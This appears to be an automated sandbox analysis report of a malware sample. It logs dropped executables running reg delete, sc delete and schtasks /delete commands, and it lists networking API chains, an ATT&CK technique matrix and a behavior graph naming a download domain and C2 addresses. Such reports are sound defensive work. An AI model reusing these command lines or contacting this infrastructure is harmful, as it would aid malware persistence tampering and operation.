    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: GetLocaleInfoA,strcmp,1_2_0040E8A0
    Source: C:\Windows\sysludpvs.exeCode function: GetLocaleInfoA,strcmp,2_2_0040E8A0
    Source: C:\Windows\sysludpvs.exeCode function: GetLocaleInfoA,strcmp,7_2_0040E8A0
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2052810334.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeQueries volume information: C:\Users\user\AppData\Local\Temp\417928448.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2047112978.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeQueries volume information: C:\Users\user\AppData\Local\Temp\399630275.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2028814805.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeQueries volume information: C:\Users\user\AppData\Local\Temp\393932919.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1216017805.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeQueries volume information: C:\Users\user\AppData\Local\Temp\38822795.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeQueries volume information: C:\Users\user\AppData\Local\Temp\396820397.exe VolumeInformation
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81A78 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00F81A78
    Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

    Remote Access Functionality

    Source: Yara matchFile source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,1_2_00401470
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,1_2_0040D880
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004013B0 CreateEventA,socket,bind,CreateThread,1_2_004013B0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,2_2_00401470
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,2_2_00402020
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,2_2_0040D880
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004013B0 CreateEventA,socket,bind,CreateThread,2_2_004013B0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,7_2_00401470
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,7_2_00402020
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040D880 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,7_2_0040D880
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,7_2_004013B0
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Native API
    1
    DLL Side-Loading
    1
    Abuse Elevation Control Mechanism
    1
    Disable or Modify Tools
    11
    Input Capture
    1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    14
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Command and Scripting Interpreter
    1
    Windows Service
    1
    DLL Side-Loading
    1
    Abuse Elevation Control Mechanism
    LSASS Memory1
    System Network Connections Discovery
    Remote Desktop Protocol11
    Input Capture
    2
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    1
    Windows Service
    1
    Obfuscated Files or Information
    Security Account Manager2
    File and Directory Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Service Execution
    1
    Registry Run Keys / Startup Folder
    311
    Process Injection
    1
    DLL Side-Loading
    NTDS25
    System Information Discovery
    Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
    Scheduled Task/Job
    121
    Masquerading
    LSA Secrets241
    Security Software Discovery
    SSHKeylogging23
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
    Registry Run Keys / Startup Folder
    1
    Modify Registry
    Cached Domain Credentials2
    Process Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
    Virtualization/Sandbox Evasion
    DCSync31
    Virtualization/Sandbox Evasion
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
    Process Injection
    Proc Filesystem1
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Hidden Files and Directories
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632967 Sample: a0RkmvhSaf.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 100 92 twizt.net 2->92 94 56.163.245.4.in-addr.arpa 2->94 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 7 other signatures 2->120 12 a0RkmvhSaf.exe 16 2->12         started        17 sysludpvs.exe 2->17         started        signatures3 process4 dnsIp5 102 twizt.net 185.215.113.66, 49709, 80 WHOLESALECONNECTIONSNL Portugal 12->102 88 C:\Users\user\AppData\Local\...\230053364.exe, PE32 12->88 dropped 90 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 12->90 dropped 148 Hides that the sample has been downloaded from the Internet (zone.identifier) 12->148 19 230053364.exe 1 1 12->19         started        file6 signatures7 process8 file9 76 C:\Windows\sysludpvs.exe, PE32 19->76 dropped 122 Multi AV Scanner detection for dropped file 19->122 124 Found evasive API chain (may stop execution after checking mutex) 19->124 126 Contains functionality to check if Internet connection is working 19->126 128 3 other signatures 19->128 23 sysludpvs.exe 21 19->23         started        signatures10 process11 dnsIp12 96 95.142.87.201, 40500, 49683 TTL-ASTJ Tajikistan 23->96 98 146.70.53.161, 40500 TENET-1ZA United Kingdom 23->98 100 79 other IPs or domains 23->100 78 C:\Users\user\AppData\Local\...\152942395.exe, PE32 23->78 dropped 130 Multi AV Scanner detection for dropped file 23->130 132 Found evasive API chain (may stop execution after checking mutex) 23->132 134 Contains functionality to check if Internet connection is working 23->134 136 2 other signatures 23->136 28 152942395.exe 37 23->28         started        file13 signatures14 process15 file16 80 C:\Users\user\AppData\Local\...\634722489.exe, PE32+ 28->80 dropped 82 C:\Users\user\AppData\Local\...\417928448.exe, PE32+ 28->82 dropped 84 
C:\Users\user\AppData\Local\...\399630275.exe, PE32+ 28->84 dropped 86 21 other malicious files 28->86 dropped 142 Antivirus detection for dropped file 28->142 144 Multi AV Scanner detection for dropped file 28->144 146 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->146 32 634722489.exe 28->32         started        35 2052810334.exe 2 28->35         started        37 2028814805.exe 28->37         started        39 7 other processes 28->39 signatures17 process18 signatures19 104 Multi AV Scanner detection for dropped file 32->104 106 Writes to foreign memory regions 32->106 108 Allocates memory in foreign processes 32->108 112 2 other signatures 32->112 41 conhost.exe 2 32->41         started        110 Antivirus detection for dropped file 35->110 43 cmd.exe 1 35->43         started        46 cmd.exe 37->46         started        48 cmd.exe 37->48         started        50 cmd.exe 39->50         started        52 cmd.exe 39->52         started        54 cmd.exe 39->54         started        56 5 other processes 39->56 process20 signatures21 58 WerFault.exe 23 16 41->58         started        138 Uses cmd line tools excessively to alter registry or file data 43->138 140 Uses schtasks.exe or at.exe to add and modify task schedules 43->140 60 conhost.exe 43->60         started        62 2 other processes 43->62 64 2 other processes 46->64 66 2 other processes 48->66 68 3 other processes 50->68 70 3 other processes 52->70 72 3 other processes 54->72 74 13 other processes 56->74 process22
